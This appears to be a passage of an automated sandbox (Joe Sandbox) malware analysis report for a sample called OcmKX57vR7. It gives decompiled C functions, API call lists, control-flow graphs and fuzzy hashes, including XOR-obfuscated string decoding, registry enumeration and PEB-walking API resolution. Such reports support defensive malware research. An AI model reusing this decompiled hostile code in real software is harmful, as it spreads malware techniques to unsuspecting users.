                                                                                                                                  0x00406b08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406b08

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1251348514-2980165447
                                                                                                                                  • Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction ID: 11eff480047975ec65ad8f821bd7964ca9f9c490359b1bf2623e7d0ea65c751f
                                                                                                                                  • Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction Fuzzy Hash: 2631F1B2900208BFDB00DFA09D44ADF7F79EF48310F158076E212F7291D674A9658F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040EC54 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24timeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 749 40ec54-40ec8f GetSystemTimeAsFileTime GetVolumeInformationA
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}






                                                                                                                                  0x0040ec5e
                                                                                                                                  0x0040ec72
                                                                                                                                  0x0040ec84
                                                                                                                                  0x0040ec89
                                                                                                                                  0x0040ec8f

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 770 ad092b-ad0970 GetPEB 771 ad0972-ad0978 770->771 772 ad098c-ad098e 771->772 773 ad097a-ad098a call ad0d35 771->773 772->771 775 ad0990 772->775 773->772 778 ad0992-ad0994 773->778 777 ad0996-ad0998 775->777 779 ad0a3b-ad0a3e 777->779 778->777 780 ad099d-ad09d3 778->780 781 ad09dc-ad09ee call ad0d0c 780->781 784 ad09d5-ad09d8 781->784 785 ad09f0-ad0a3a 781->785 784->781 785->779
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                  • Instruction ID: 639cbf737e4a0a6b2b1cda363200c12007c05689cd24543dc61b07835d1c9a01
                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                  • Instruction Fuzzy Hash: 61314CB6900609DFDB10CF99C880BAEBBF5FF48724F25404AD442A7351D771EA45CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040EBCC Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0040EB74(_t7);
				return _t7;
			}





                                                                                                                                  0x0040ebda
                                                                                                                                  0x0040ebe0
                                                                                                                                  0x0040ebe3
                                                                                                                                  0x0040ebec

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                    • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                                                                    • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocateSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559512979-0
                                                                                                                                  • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                                                                  • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                                                                  • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                                                                  • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004073FF Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 283 407703-40770e RegEnumKeyA 277->283 284 407801 278->284 285 4074a2-4074b1 call 406cad 283->285 286 407714-40771d RegCloseKey 283->286 287 407804-407808 284->287 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->284 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->283 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 305 407536-40753c 296->305 309 4076df-4076e2 297->309 306 407742-407745 RegCloseKey 298->306 307 40774b-40774e 298->307 308 40753f-407544 305->308 306->307 311 4077ec-4077f7 RegCloseKey 307->311 308->308 310 407546-40754b 308->310 309->291 312 4076e4-4076e7 RegCloseKey 309->312 310->297 313 407551-40756b call 40ee95 310->313 311->287 312->291 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 329 4075d8-4075da 323->329 324->329 331 4075dc 329->331 332 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 329->332 331->332 342 407626-40762b 332->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 346->347 352 407769-40777c call 40ef00 346->352 353 407680 347->353 354 407675-40767e 347->354 359 4077e3-4077e6 RegCloseKey 352->359 356 407683-40768e call 406cad 353->356 354->356 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->311 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->309 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 378 4077d7-4077dc 376->378 379 4077ca-4077d6 call 40ef00 376->379 377->376 383 4077e0-4077e2 378->383 384 4077de 378->384 379->378 383->359 384->383
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12);
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20); // executed
					L66:
					return _t93 | 0xffffffff;
				}
			}























































                                                                                                                                  0x004073ff
                                                                                                                                  0x00407408
                                                                                                                                  0x0040740e
                                                                                                                                  0x00407410
                                                                                                                                  0x00407419
                                                                                                                                  0x0040741b
                                                                                                                                  0x0040741b
                                                                                                                                  0x0040741d
                                                                                                                                  0x00407422
                                                                                                                                  0x00407424
                                                                                                                                  0x00407424
                                                                                                                                  0x00407426
                                                                                                                                  0x0040742b
                                                                                                                                  0x0040742d
                                                                                                                                  0x0040742d
                                                                                                                                  0x00407430
                                                                                                                                  0x00407435
                                                                                                                                  0x00407437
                                                                                                                                  0x00407437
                                                                                                                                  0x0040743a
                                                                                                                                  0x0040743f
                                                                                                                                  0x00407451
                                                                                                                                  0x00407464
                                                                                                                                  0x00407469
                                                                                                                                  0x00407472
                                                                                                                                  0x00407478
                                                                                                                                  0x0040747d
                                                                                                                                  0x0040747e
                                                                                                                                  0x00407481
                                                                                                                                  0x004077f9
                                                                                                                                  0x00000000
                                                                                                                                  0x00407487
                                                                                                                                  0x00407487
                                                                                                                                  0x0040748c
                                                                                                                                  0x0040748f
                                                                                                                                  0x00407498
                                                                                                                                  0x00407499
                                                                                                                                  0x0040749c
                                                                                                                                  0x00407703
                                                                                                                                  0x00407706
                                                                                                                                  0x0040770e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004074b1
                                                                                                                                  0x004076ed
                                                                                                                                  0x004076ed
                                                                                                                                  0x004076f5
                                                                                                                                  0x004076f6
                                                                                                                                  0x004076ff
                                                                                                                                  0x00407700
                                                                                                                                  0x00000000
                                                                                                                                  0x00407700
                                                                                                                                  0x004074be
                                                                                                                                  0x004074c8
                                                                                                                                  0x004074cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004074e6
                                                                                                                                  0x004074e9
                                                                                                                                  0x004074f0
                                                                                                                                  0x004074f8
                                                                                                                                  0x00407727
                                                                                                                                  0x0040772a
                                                                                                                                  0x00407755
                                                                                                                                  0x0040775c
                                                                                                                                  0x00407761
                                                                                                                                  0x004076df
                                                                                                                                  0x004076e2
                                                                                                                                  0x004076e7
                                                                                                                                  0x004076e7
                                                                                                                                  0x00000000
                                                                                                                                  0x004076e2
                                                                                                                                  0x00407736
                                                                                                                                  0x00407740
                                                                                                                                  0x00407745
                                                                                                                                  0x00407745
                                                                                                                                  0x0040774b
                                                                                                                                  0x0040774d
                                                                                                                                  0x004077ec
                                                                                                                                  0x004077ef
                                                                                                                                  0x00000000
                                                                                                                                  0x004077f5
                                                                                                                                  0x0040751c
                                                                                                                                  0x00407521
                                                                                                                                  0x00407528
                                                                                                                                  0x00407530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407536
                                                                                                                                  0x0040753c
                                                                                                                                  0x0040753f
                                                                                                                                  0x0040753f
                                                                                                                                  0x00407541
                                                                                                                                  0x00407542
                                                                                                                                  0x0040754b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040755f
                                                                                                                                  0x00407565
                                                                                                                                  0x00407566
                                                                                                                                  0x0040756b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407589
                                                                                                                                  0x0040758e
                                                                                                                                  0x00407593
                                                                                                                                  0x00407753
                                                                                                                                  0x00000000
                                                                                                                                  0x00407753
                                                                                                                                  0x004075a0
                                                                                                                                  0x004075d1
                                                                                                                                  0x004075d7
                                                                                                                                  0x004075a2
                                                                                                                                  0x004075b0
                                                                                                                                  0x004075be
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075da
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075fc
                                                                                                                                  0x00407615
                                                                                                                                  0x00407618
                                                                                                                                  0x0040761d
                                                                                                                                  0x00407620
                                                                                                                                  0x00407623
                                                                                                                                  0x00407626
                                                                                                                                  0x00407626
                                                                                                                                  0x00407628
                                                                                                                                  0x00407629
                                                                                                                                  0x0040762d
                                                                                                                                  0x00407632
                                                                                                                                  0x00407634
                                                                                                                                  0x00407634
                                                                                                                                  0x00407637
                                                                                                                                  0x00407637
                                                                                                                                  0x00407639
                                                                                                                                  0x0040763a
                                                                                                                                  0x0040763e
                                                                                                                                  0x00407642
                                                                                                                                  0x0040765c
                                                                                                                                  0x00407664
                                                                                                                                  0x00407667
                                                                                                                                  0x0040766e
                                                                                                                                  0x00407673
                                                                                                                                  0x00407680
                                                                                                                                  0x00407675
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040768e
                                                                                                                                  0x00407722
                                                                                                                                  0x00000000
                                                                                                                                  0x00407694
                                                                                                                                  0x004076a1
                                                                                                                                  0x004076ad
                                                                                                                                  0x004076b3
                                                                                                                                  0x004076bf
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076dd
                                                                                                                                  0x00000000
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076c1
                                                                                                                                  0x004076c7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040777e
                                                                                                                                  0x00407785
                                                                                                                                  0x00407797
                                                                                                                                  0x00407799
                                                                                                                                  0x00407799
                                                                                                                                  0x0040779a
                                                                                                                                  0x0040779f
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a3
                                                                                                                                  0x004077a8
                                                                                                                                  0x004077b3
                                                                                                                                  0x004077b8
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c8
                                                                                                                                  0x004077d0
                                                                                                                                  0x004077d6
                                                                                                                                  0x004077d7
                                                                                                                                  0x004077dc
                                                                                                                                  0x004077de
                                                                                                                                  0x004077de
                                                                                                                                  0x004077e0
                                                                                                                                  0x004077e2
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e2
                                                                                                                                  0x004076c7
                                                                                                                                  0x00407769
                                                                                                                                  0x00407773
                                                                                                                                  0x004077e3
                                                                                                                                  0x004077e6
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e6
                                                                                                                                  0x00407642
                                                                                                                                  0x00407717
                                                                                                                                  0x00407801
                                                                                                                                  0x00000000
                                                                                                                                  0x00407801

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 00407472
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004074F0
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 00407528
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004076E7
                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 00407717
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 00407745
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 004077EF
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004077E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3433985886-3108538426
                                                                                                                                  • Opcode ID: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                                                                  • Opcode Fuzzy Hash: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040704C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 332registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
